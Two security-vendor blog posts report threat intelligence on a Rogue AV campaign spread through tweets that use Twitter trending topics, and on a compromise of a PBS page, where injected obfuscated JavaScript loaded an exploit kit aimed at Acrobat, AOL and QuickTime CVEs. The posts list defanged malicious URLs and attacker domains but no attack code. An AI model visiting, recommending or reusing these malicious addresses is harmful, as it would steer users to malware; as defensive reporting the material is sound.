The Barracuda Labs Internet Security Blog

Posted by: Barracuda Labs

Last night, a Purewire employee was directed to a Rogue AV website after clicking on a link in a tweet that matched a popular topic. Subsequent analysis uncovered an active Rogue AV propagation campaign that attempts to lure users to malicious websites via tweets that contain popular terms searched on Twitter.

The malicious tweets draw part of their word content from Twitter’s Trending Topics list; a screenshot of the list at the time of this writing is shown below.

Twitter Trending Topics

Searches that use some of the above topics lead to these tweets, as shown in the following examples:

hxxp://securityland.cn/?uid=144&pid=3&ttl=31c48520c54

which acts as a traffic distribution system for a Rogue AV operation; the chain of redirections ends at one of the following Rogue AV distribution points:

All of the above sites serve javascript-based fake system scanners:

which attempt to compel the user to download Windows PC Defender, a brand of Rogue AV software. AV detections for the Rogue AV malware instance served are non-existent:

http://www.virustotal.com/analisis/9a155d62af5b43be29018f7d0f52875503c6d15a3
c891cb5807ed123398889ca-1253323103

Users of the PWSS are protected from this campaign.

Posted by: Barracuda Labs

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.bps.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.“

Users of the PWSS are protected from this campaign.

Update, Sep 18, 2:49PM ET: PBS has notified Purewire that the malicious javascript has been removed from its site.